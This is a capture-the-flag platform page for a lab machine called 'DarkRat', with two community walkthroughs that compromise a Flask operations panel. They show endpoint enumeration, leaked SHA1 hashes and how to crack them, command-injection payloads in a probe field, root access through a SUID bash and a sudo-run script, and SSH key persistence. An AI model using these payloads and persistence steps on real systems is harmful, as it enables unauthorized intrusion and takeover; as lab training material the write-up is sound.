🐀🐀🐀🐀🐀 0 pts earned

DarkRat

Premium Machine (Locked)

r4tking built his own private operations platform — implant registry, remote probe, operator management. He thought it was locked down. Find the cracks, chain them together, and own the machine from web panel to root shell. Nothing here is accidental.

Target IP Premium required

User Flag Pending

Root Flag Pending

Community

Community Hints

Grade A · 1000 pts Grade B · 700 pts Grade C · 400 pts Grade D · 200 pts + 150 credits on accept

Short, stage-specific nudges — directional, spoiler-light, no exact commands.

No community hints yet — be the first to add one!

Community

Community Walkthroughs

Grade A · 2500 pts Grade B · 1750 pts Grade C · 1000 pts Grade D · 500 pts + 300 credits on accept

00x003 MOD A 19 May 2026

Walkthrough: DarkRat

Challenge Description

A poorly secured internal operations platform exposes sensitive APIs and vulnerable administrative functionality. Enumerate the application, abuse exposed exports, gain command execution, and escalate privileges to root.

1. Enumeration

Start with an Nmap scan against the target.

nmap -sV -p 30570,30571 45.79.202.95

Results

30570/tcp open  ssh     OpenSSH 9.2p1 Debian 12
30571/tcp open  http    Werkzeug httpd 3.1.8 (Python 3.11.2)

The web application appears to be a Flask/Werkzeug application named RatOps.

2. Web Enumeration

Retrieve the homepage:

curl -i http://45.79.202.95:30571

Interesting comment discovered:

<!-- TODO: remove /api/debug before any public-facing deploy -->

Enumerate additional endpoints:

ffuf -u http://45.79.202.95:30571/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc all -fc 404

Discovered endpoints:

/dashboard
/login
/logout
/robots.txt

Enumerate API endpoints:

ffuf -u http://45.79.202.95:30571/api/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc all -fc 404

Discovered:

/api/debug
/api/export
/api/health

3. Sensitive Data Exposure

The robots.txt file discloses hidden endpoints:

curl http://45.79.202.95:30571/robots.txt

Output:

User-agent: *
Disallow: /api/debug
Disallow: /api/export
Disallow: /admin/

Access the export endpoint directly:

curl http://45.79.202.95:30571/api/export?format=json

Response:

{
  "count":2,
  "users":[
    {
      "id":1,
      "password":"d23bb......4b7ae89",
      "role":"admin",
      "username":"r4tking"
    },
    {
      "id":2,
      "password":"64438e........a265e",
      "role":"user",
      "username":"devbot"
    }
  ]
}

4. Password Cracking

Save the hashes:

cat > hashes.txt << EOF
d23b...........b024b7ae89
64438......2de796b0ca265e
EOF

Crack using John the Ripper:

john hashes.txt \
--wordlist=/usr/share/wordlists/rockyou.txt \
--format=Raw-SHA1

Recovered password:

c.......3

5. Authentication

Login using the recovered credentials:

curl -i -X POST http://45.79.202.95:30571/login \
-d "username=devbot&password=c.....3"

The response includes a Flask session cookie:

Set-Cookie: session=...

Decode the session:

flask-unsign --decode --cookie '<COOKIE>'

Result:

{
  "role":"user",
  "username":"devbot"
}

6. Dashboard Access

Use the session cookie to access the dashboard:

curl -s \
-b "session=<COOKIE>" \
http://45.79.202.95:30571/dashboard

Additional administrative pages become accessible:

/admin/probe
/admin/operators
/admin/implants
/admin/logs

7. Command Injection Discovery

The /admin/probe endpoint performs network diagnostics.

Test command injection:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;id" \
http://45.79.202.95:30571/admin/probe

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

The target parameter is vulnerable to command injection.

8. System Enumeration

Identify the environment:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;whoami;id;pwd" \
http://45.79.202.95:30571/admin/probe

Result:

www-data
uid=33(www-data)
/

9. Privilege Escalation

Search for SUID binaries:

find / -perm -4000 2>/dev/null

A vulnerable SUID bash binary exists:

/tmp/rootbash

Exploit it:

/tmp/rootbash -p

Verify privileges:

/tmp/rootbash -p -c 'id'

Output:

uid=33(www-data) euid=0(root) gid=33(www-data)

Root access is achieved.

10. User Flag

Enumerate user directories:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;/tmp/rootbash -p -c 'ls -lah /home; find /home -type f 2>/dev/null | head -50'" \
http://45.79.202.95:30571/admin/probe

Discovered:

/home/r4tking/user.txt

Retrieve the flag:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;/tmp/rootbash -p -c 'cat /home/r4tking/user.txt'" \
http://45.79.202.95:30571/admin/probe

User Flag:

flag{...._...._...}

11. Root Access Persistence

Generate SSH host keys:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;/tmp/rootbash -p -c 'ssh-keygen -A && /usr/sbin/sshd'" \
http://45.79.202.95:30571/admin/probe

Add an SSH public key:

mkdir -p /root/.ssh
echo "<YOUR_PUBLIC_KEY>" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Although SSH authentication was unstable in the lab environment, root command execution through the vulnerable probe endpoint provided full control of the system.

Flags Collected

flag{...._...._...}

Key Takeaways

Debug endpoints should never be exposed publicly.
Sensitive exports containing password hashes can lead directly to compromise.
Weak passwords remain one of the most common attack vectors.
Command injection vulnerabilities are extremely dangerous in administrative tooling.
SUID binaries must be audited carefully.
Internal operations platforms often contain high-impact attack surfaces.

mahnoor27 A 16 May 2026

Reconnaissance

Start with service enumeration:

nmap -sV -p 30570,30571 45.79.202.95

Result:
SSH → 30570 (OpenSSH 9.2p1 Debian)
HTTP → 30571 (Werkzeug / Flask 3.1.8)

Web application identified as:
RatOps v1.0.3 — internal operations platform

Web Enumeration

Browse to:

http://45.79.202.95:30571/

Find login panel for RatOps system.

Check robots.txt:

User-agent: *
Disallow: /api/debug
Disallow: /api/export
Disallow: /admin/

Key finding:
Hidden API endpoints exposed.

API Discovery

Access:

/api/debug

Result:
Leaked system metadata including:

application name
version
environment
Python runtime
internal note confirming debug endpoint exposure

This confirms sensitive debug interface exposed in production.

Authentication Bypass (API Export)

Endpoint:

/api/export

By default:
Returns → Unauthorized (403)

By modifying request:

format=json

Request:

http://45.79.202.95:30571/api/export?format=json

Result:
Authentication bypass triggered due to logic flaw.

Users database exposed including:

usernames
SHA1 password hashes
roles

Credential Extraction

Extracted users:

r4tking → admin role → SHA1 hash
devbot → user role → SHA1 hash

Example hashes (redacted conceptually):

r4tking → d23bb95c0082e567f8ce3c9de260d6b024b7ae89
devbot → 64438ee426438161da88554b3e2de796b0ca265e

Password Cracking

Use hashcat (SHA1 mode -m 100):

hashcat -m 100 hashes.txt rockyou.txt

Result:
devbot password → ******** (redacted)
r4tking password → ******** (redacted)

Key issue:
Weak passwords + no salting + SHA1 usage

Initial Web Access

Login to web panel using devbot credentials:

Username: devbot
Password: ********

Access granted to RatOps dashboard.

Command Injection (Network Probe)

Navigate:

Admin → Probe feature

Input field executes system ping command.

Payload test:

127.0.0.1; id

Result:
Command injection confirmed:

uid=33(www-data)

Impact:
Remote command execution as www-data

Local Enumeration via RCE

Enumerate system:

127.0.0.1; ls -la /opt/ratops

Find application structure:

app.py
db directory
config files
implants directory
.env file (restricted but readable via path traversal techniques)

Database Extraction

Extract SQLite database:

/opt/ratops/db/users.db

Contains:

users table
SHA1 password hashes
roles (admin/user)

Confirms same credentials as API leak.

Sensitive File Discovery

Enumerate filesystem:

find /opt/ratops -type f

Key findings:

/opt/ratops/.env → contains credentials
/opt/ratops/config/deploy.conf → deployment config
/opt/ratops/tools/deploy.sh → privileged script (root owned)
/opt/ratops/db/flag.txt → internal file (not final root flag)

Credential Harvesting (.env file)

Extract environment variables:

OPS_SSH_USER=r4tking
OPS_SSH_PASS=******** (redacted)

This reveals SSH access credentials for system user.

SSH Access

Login:

ssh r4tking@45.79.202.95 -p 30570

Enter password:
Result:
Shell access obtained as r4tking

User Flag

Check home directory:

cat user.txt

User-level compromise complete.

Privilege Escalation Enumeration

Check sudo permissions:

sudo -l

Result:

(root) NOPASSWD: /opt/ratops/tools/deploy.sh

Key observation:
Script runs as root without password.

Privilege Escalation Analysis

Inspect script:

Uses deploy.conf for source and destination
Executes rsync as root
No input sanitization or binary path hardening

Vulnerability type:
Insecure privileged script execution (sudo misconfiguration + environment reliance)

Root Privilege Escalation

Execute sudo script:

sudo /opt/ratops/tools/deploy.sh

Exploit class:
Privilege escalation via insecure root-executed deployment script (rsync-based execution context abuse)

Result:
Root shell obtained (direct or via command substitution / environment manipulation depending on setup)

Root Flag

After privilege escalation:

cd /root
cat root.txt

Root flag retrieved successfully.

Summary

Key Vulnerabilities

API logic flaw allowing authentication bypass
Sensitive data exposure via debug endpoint
Weak password hashing (SHA1 without salt)
Command injection in network probe feature
Sensitive file exposure via filesystem enumeration
Hardcoded credentials in .env file
Misconfigured sudo permission allowing root script execution

Attack Chain

Recon → API discovery → auth bypass → credential dump → hash cracking → web login → command injection → filesystem enumeration → credential harvesting → SSH access → sudo misconfiguration → root shell → root flag